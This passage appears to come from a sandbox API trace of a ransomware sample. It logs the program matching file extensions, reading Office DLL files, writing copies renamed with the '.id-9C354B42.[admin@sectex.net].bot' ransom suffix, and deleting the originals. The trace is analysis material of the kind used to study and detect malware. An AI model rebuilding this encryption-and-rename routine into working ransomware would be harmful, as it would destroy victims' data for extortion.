	[0149.936] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString=".bz2") returned 4
	[0149.936] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.936] lstrlenW (lpString=".7z") returned 3
	[0149.936] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString=".dbf") returned 4
	[0149.936] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString=".1cd") returned 4
	[0149.936] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString=".jpg") returned 4
	[0149.936] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString=".doc") returned 4
	[0149.936] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString=".docx") returned 5
	[0149.936] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0149.936] lstrlenW (lpString=".pdf") returned 4
	[0149.936] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString=".xls") returned 4
	[0149.936] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString=".xlsx") returned 5
	[0149.936] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0149.936] lstrlenW (lpString=".ppt") returned 4
	[0149.936] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.936] lstrlenW (lpString=".zip") returned 4
	[0149.936] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.937] lstrlenW (lpString=".rar") returned 4
	[0149.937] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.937] lstrlenW (lpString=".bz2") returned 4
	[0149.937] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.937] lstrlenW (lpString=".7z") returned 3
	[0149.937] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.937] lstrlenW (lpString=".dbf") returned 4
	[0149.937] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.937] lstrlenW (lpString=".1cd") returned 4
	[0149.937] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL") returned 58
	[0149.937] lstrlenW (lpString=".jpg") returned 4
	[0149.937] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.937] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0149.937] lstrlenW (lpString="PPINTL.DLL.IDX_DLL") returned 18
	[0149.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.938] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=38272) returned 1
	[0149.938] CloseHandle (hObject=0x384) returned 1
	[0149.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll")) returned 0x20
	[0149.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.938] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.938] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0149.978] GetLastError () returned 0x0
	[0149.978] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x9580, lpOverlapped=0x0) returned 1
	[0150.014] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x9590, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x9590, lpOverlapped=0x0) returned 1
	[0150.017] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.017] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0150.017] SetEndOfFile (hFile=0x3b4) returned 1
	[0150.018] CloseHandle (hObject=0x3b4) returned 1
	[0150.018] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.018] SetEndOfFile (hFile=0x384) returned 1
	[0150.020] CloseHandle (hObject=0x384) returned 1
	[0150.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ppintl.dll.idx_dll")) returned 1
	[0150.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.021] lstrlenW (lpString=".doc") returned 4
	[0150.021] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.021] lstrlenW (lpString=".docx") returned 5
	[0150.021] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.021] lstrlenW (lpString=".pdf") returned 4
	[0150.021] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.021] lstrlenW (lpString=".xls") returned 4
	[0150.021] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.021] lstrlenW (lpString=".xlsx") returned 5
	[0150.021] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.021] lstrlenW (lpString=".ppt") returned 4
	[0150.022] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString=".zip") returned 4
	[0150.022] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".rar") returned 4
	[0150.022] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".bz2") returned 4
	[0150.022] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".7z") returned 3
	[0150.022] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString=".dbf") returned 4
	[0150.022] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString=".1cd") returned 4
	[0150.022] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString=".jpg") returned 4
	[0150.022] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.022] lstrlenW (lpString=".doc") returned 4
	[0150.022] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".docx") returned 5
	[0150.022] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.022] lstrlenW (lpString=".pdf") returned 4
	[0150.022] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".xls") returned 4
	[0150.022] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.022] lstrlenW (lpString=".xlsx") returned 5
	[0150.023] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.023] lstrlenW (lpString=".ppt") returned 4
	[0150.023] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.023] lstrlenW (lpString=".zip") returned 4
	[0150.023] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString=".rar") returned 4
	[0150.023] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString=".bz2") returned 4
	[0150.023] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString=".7z") returned 3
	[0150.023] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.023] lstrlenW (lpString=".dbf") returned 4
	[0150.023] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.023] lstrlenW (lpString=".1cd") returned 4
	[0150.023] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.DLL.IDX_DLL") returned 66
	[0150.023] lstrlenW (lpString=".jpg") returned 4
	[0150.023] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.023] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0150.023] lstrlenW (lpString="PUB6INTL.DLL") returned 12
	[0150.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.041] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6982504) returned 1
	[0150.041] CloseHandle (hObject=0x3e8) returned 1
	[0150.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll")) returned 0x20
	[0150.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0150.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.041] lstrlenW (lpString=".doc") returned 4
	[0150.041] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.041] lstrlenW (lpString=".docx") returned 5
	[0150.041] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0150.041] lstrlenW (lpString=".pdf") returned 4
	[0150.041] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.041] lstrlenW (lpString=".xls") returned 4
	[0150.042] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString=".xlsx") returned 5
	[0150.042] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0150.042] lstrlenW (lpString=".ppt") returned 4
	[0150.042] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString=".zip") returned 4
	[0150.042] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString=".rar") returned 4
	[0150.042] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString=".bz2") returned 4
	[0150.042] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.042] lstrlenW (lpString=".7z") returned 3
	[0150.042] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString=".dbf") returned 4
	[0150.042] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString=".1cd") returned 4
	[0150.042] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString=".jpg") returned 4
	[0150.042] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.042] lstrlenW (lpString=".doc") returned 4
	[0150.042] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0150.042] lstrlenW (lpString=".docx") returned 5
	[0150.042] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0150.042] lstrlenW (lpString=".pdf") returned 4
	[0150.043] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0150.043] lstrlenW (lpString=".xls") returned 4
	[0150.043] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0150.043] lstrlenW (lpString=".xlsx") returned 5
	[0150.043] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0150.043] lstrlenW (lpString=".ppt") returned 4
	[0150.043] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0150.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.043] lstrlenW (lpString=".zip") returned 4
	[0150.043] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0150.043] lstrlenW (lpString=".rar") returned 4
	[0150.043] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0150.043] lstrlenW (lpString=".bz2") returned 4
	[0150.043] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0150.043] lstrlenW (lpString=".7z") returned 3
	[0150.043] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.043] lstrlenW (lpString=".dbf") returned 4
	[0150.043] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0150.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.043] lstrlenW (lpString=".1cd") returned 4
	[0150.043] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0150.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL") returned 60
	[0150.043] lstrlenW (lpString=".jpg") returned 4
	[0150.043] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0150.043] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0150.043] lstrlenW (lpString="PUB6INTL.DLL.IDX_DLL") returned 20
	[0150.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.044] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=67968) returned 1
	[0150.044] CloseHandle (hObject=0x3e8) returned 1
	[0150.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll")) returned 0x20
	[0150.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.045] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.045] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.045] GetLastError () returned 0x0
	[0150.045] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x10980, lpOverlapped=0x0) returned 1
	[0150.048] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x10990, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x10990, lpOverlapped=0x0) returned 1
	[0150.050] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.050] WriteFile (in: hFile=0x3fc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0150.050] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.051] CloseHandle (hObject=0x3fc) returned 1
	[0150.051] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.051] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.054] CloseHandle (hObject=0x3e8) returned 1
	[0150.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll")) returned 1
	[0150.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.054] lstrlenW (lpString=".doc") returned 4
	[0150.055] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".docx") returned 5
	[0150.055] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.055] lstrlenW (lpString=".pdf") returned 4
	[0150.055] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".xls") returned 4
	[0150.055] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".xlsx") returned 5
	[0150.055] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.055] lstrlenW (lpString=".ppt") returned 4
	[0150.055] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.055] lstrlenW (lpString=".zip") returned 4
	[0150.055] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".rar") returned 4
	[0150.055] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".bz2") returned 4
	[0150.055] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString=".7z") returned 3
	[0150.055] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.055] lstrlenW (lpString=".dbf") returned 4
	[0150.055] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.055] lstrlenW (lpString=".1cd") returned 4
	[0150.055] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.055] lstrlenW (lpString=".jpg") returned 4
	[0150.055] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString=".doc") returned 4
	[0150.056] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".docx") returned 5
	[0150.056] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.056] lstrlenW (lpString=".pdf") returned 4
	[0150.056] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".xls") returned 4
	[0150.056] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".xlsx") returned 5
	[0150.056] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.056] lstrlenW (lpString=".ppt") returned 4
	[0150.056] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString=".zip") returned 4
	[0150.056] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".rar") returned 4
	[0150.056] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".bz2") returned 4
	[0150.056] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.056] lstrlenW (lpString=".7z") returned 3
	[0150.056] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 68
	[0150.056] lstrlenW (lpString=".dbf") returned 4
	[0150.056] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
